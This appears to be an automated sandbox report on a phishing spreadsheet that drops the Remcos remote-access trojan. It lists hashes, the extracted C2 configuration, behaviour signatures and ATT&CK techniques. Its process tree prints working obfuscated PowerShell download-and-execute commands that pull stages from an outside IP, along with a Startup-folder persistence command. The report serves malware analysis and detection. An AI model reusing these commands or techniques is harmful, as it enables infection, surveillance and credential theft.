Overview

overview

10

Static

static

8

Remittance...fA.xls

windows7-x64

10

Remittance...fA.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    209s
  • max time network
    207s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-08-2022 20:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Remittance_Advice_BofA.xls

  • Size

    129KB

  • MD5

    ef647821a5b83276209b316934bad8ab

  • SHA1

    1e01b86c162aad282434c34d13147dd404e8d59a

  • SHA256

    adbbd78d5c79c11d3e5f723085b3d5d3fb2a34047a3e2a8791cdd764b78b08f7

  • SHA512

    a2d6cb284376ac52fbeaf895b85e7924b17248b4af8b057c5c24990430963aa0a04a427a3aa2634e4d8594579c23411afa5bbc446933f2fee2bf65dd60e4f55c

Score
10/10
remcosaugcollectionratspywarestealer

Malware Config

Extracted

Family

remcos

Botnet

Aug

C2

topboysully.dvrlists.com:10171

Attributes
  • audio_folder

    MicRecords

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    Aug-MR3KZU

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 30 IoCs
    adwarespyware
  • Modifies registry class 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Remittance_Advice_BofA.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1280
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\rkWwH.js"
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:5064
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ew\''+pmet:vne$,''sbv.enixam/31.02.721.902//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\we.vbs');remove-item ($env:appdata + '\rkWwH.js')
        3⤵
        • Blocklisted process makes network request
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1708
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\we.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4696
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110010,00110000,00111001,00101110,00110001,00110010,00110111,00101110,00110010,00110000,00101110,00110001,00110011,00101111,01101101,01100001,01111000,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='ZE000'.replace('Z','I').replace('000','x');sal P $o00;([system.String]::Join('', $gf))|P
            5⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5040
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              6⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:3172
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xrdxquuntc"
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:4600
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zljqrmfhhleca"
                7⤵
                • Accesses Microsoft Outlook accounts
                PID:1048
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\knwajeqivtwhclzwf"
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4956
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\we.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\we.vbs'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4868
  • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
    "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
    1⤵
      PID:1416
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5092
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5092 CREDAT:17410 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:4084

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    Lateral Movement

    Collection

    Data from Local System

    1
    T1005

    Email Collection

    1
    T1114

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      556084f2c6d459c116a69d6fedcc4105

      SHA1

      633e89b9a1e77942d822d14de6708430a3944dbc

      SHA256

      88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

      SHA512

      0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\z2evvp3\imagestore.dat
      Filesize

      30KB

      MD5

      d9d0543f39ef0a7b9ad04402b1ab8bcc

      SHA1

      fa5b074f4bf4a3bc2763da85f85def62d2709e1b

      SHA256

      d48719250efd24778cc15f7c96972f1cd9a7f57e3a4f1d0cb1a04c016160e9cd

      SHA512

      b13ad5db6666a8317a75b5de6088b071f190ace89c1cb3e539ffa07e92dc887dbe7927a22f17cefeed29383f61233bd0ae48a82446911895f745a3834d1d0f4f

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      2247453c28acd1eb75cfe181540458a8

      SHA1

      851fc5a9950d422d76163fdc6a453d6859d56660

      SHA256

      358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd

      SHA512

      42475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      a854d979ef8da9302b9bd0c4d98ed8bd

      SHA1

      bf6ab378ca14e07095d701b757d7e88ebae2f944

      SHA256

      e93b4e8f3f4bdee8d5bbfcfa79f12e90d5cdc060859ce9326bb40db2c9c34a8e

      SHA512

      c6961f80db242ece9fa69761d5dfa5c8bd3194857d11d2f8300fdbb7cb9b6ff0765d2e4de715b6a31492e5a04f80619113c6e63cef747e802888c83cd9019caf

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\0b11dad3-e15c-4937-b805-b2895dc6b4e7\AgileDotNetRT64.dll
      Filesize

      75KB

      MD5

      42b2c266e49a3acd346b91e3b0e638c0

      SHA1

      2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

      SHA256

      adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

      SHA512

      770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\we.vbs
      Filesize

      2KB

      MD5

      b53758dd50ce606eaa76ab0c58ae4b34

      SHA1

      6e7b58e1b6211b2985de1b025bb98a4ec1bfc733

      SHA256

      efc8b02481aee3a35928036674d959f24cc05eea59a9dff66a3962474b7a57c0

      SHA512

      46ea6773fbb07d12987855575f5b865e55a3832ac0343a6d24816333454069bf98276192859a6fcb2e88c4ed3b0f6ac62c787a4faf5c87fc2afe1f794e4b4053

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\xrdxquuntc
      Filesize

      4KB

      MD5

      d06ebab8b0513f602e535079a9ebbeea

      SHA1

      d29472e6eb5a72f0353d70b97a33337b255b487e

      SHA256

      0c9e16830ccc6495def187adde2137ac07a566e1534e5714f626dcd68d28094c

      SHA512

      002df6f401950fd24d5976a47c58e9e2c58cef7d4fdec69f815fb6a00fb1e1a8963a4a7bf52056e61d6f6875edec393c466742c3031dd5f88802b45ddadca209

      Download Submit
    • C:\Users\Admin\AppData\Roaming\rkWwH.js
      Filesize

      695B

      MD5

      958e7511e960acbe7f862384301d972d

      SHA1

      cb053892de113da9568f71ed9e0cde281ec1d8bd

      SHA256

      4470c999e598819193ab3e7fd01398d9051f9009a78c4ad3b2230fb6686614b6

      SHA512

      8a1c1a239b96737787a4934bc9edd3484efb41be5fce2d576220c8a8bd438d138866ba446986bd0b13958b1513f964106fc36038c8a9394780b2482ff78a2f10

      Download Submit
    • memory/1048-167-0x0000000000000000-mapping.dmp
      Download
    • memory/1048-169-0x0000000000400000-0x0000000000457000-memory.dmp
      Filesize

      348KB

      Download
    • memory/1280-139-0x00000162E5EF2000-0x00000162E5EF4000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1280-132-0x00007FFA46370000-0x00007FFA46380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1280-138-0x00007FFA43E70000-0x00007FFA43E80000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1280-137-0x00007FFA43E70000-0x00007FFA43E80000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1280-136-0x00007FFA46370000-0x00007FFA46380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1280-135-0x00007FFA46370000-0x00007FFA46380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1280-148-0x00000162E5EF2000-0x00000162E5EF4000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1280-133-0x00007FFA46370000-0x00007FFA46380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1280-134-0x00007FFA46370000-0x00007FFA46380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1708-142-0x0000000000000000-mapping.dmp
      Download
    • memory/1708-147-0x00007FFA5DE80000-0x00007FFA5E941000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/1708-144-0x00007FFA5DE80000-0x00007FFA5E941000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/1708-143-0x0000023378B90000-0x0000023378BB2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/3172-161-0x0000000000400000-0x000000000047E000-memory.dmp
      Filesize

      504KB

      Download
    • memory/3172-158-0x0000000000400000-0x000000000047E000-memory.dmp
      Filesize

      504KB

      Download
    • memory/3172-159-0x0000000000431BE8-mapping.dmp
      Download
    • memory/3172-173-0x0000000000400000-0x000000000047E000-memory.dmp
      Filesize

      504KB

      Download
    • memory/3172-162-0x0000000000400000-0x000000000047E000-memory.dmp
      Filesize

      504KB

      Download
    • memory/3172-164-0x0000000000400000-0x000000000047E000-memory.dmp
      Filesize

      504KB

      Download
    • memory/4600-171-0x0000000000400000-0x0000000000478000-memory.dmp
      Filesize

      480KB

      Download
    • memory/4600-166-0x0000000000000000-mapping.dmp
      Download
    • memory/4696-145-0x0000000000000000-mapping.dmp
      Download
    • memory/4868-154-0x00007FFA5D230000-0x00007FFA5DCF1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4868-150-0x0000000000000000-mapping.dmp
      Download
    • memory/4956-168-0x0000000000000000-mapping.dmp
      Download
    • memory/4956-170-0x0000000000400000-0x0000000000424000-memory.dmp
      Filesize

      144KB

      Download
    • memory/5040-165-0x00007FFA5D230000-0x00007FFA5DCF1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/5040-157-0x00007FFA56700000-0x00007FFA5684E000-memory.dmp
      Filesize

      1.3MB

      Download
    • memory/5040-155-0x00007FFA5D230000-0x00007FFA5DCF1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/5040-149-0x0000000000000000-mapping.dmp
      Download
    • memory/5064-140-0x0000000000000000-mapping.dmp
      Download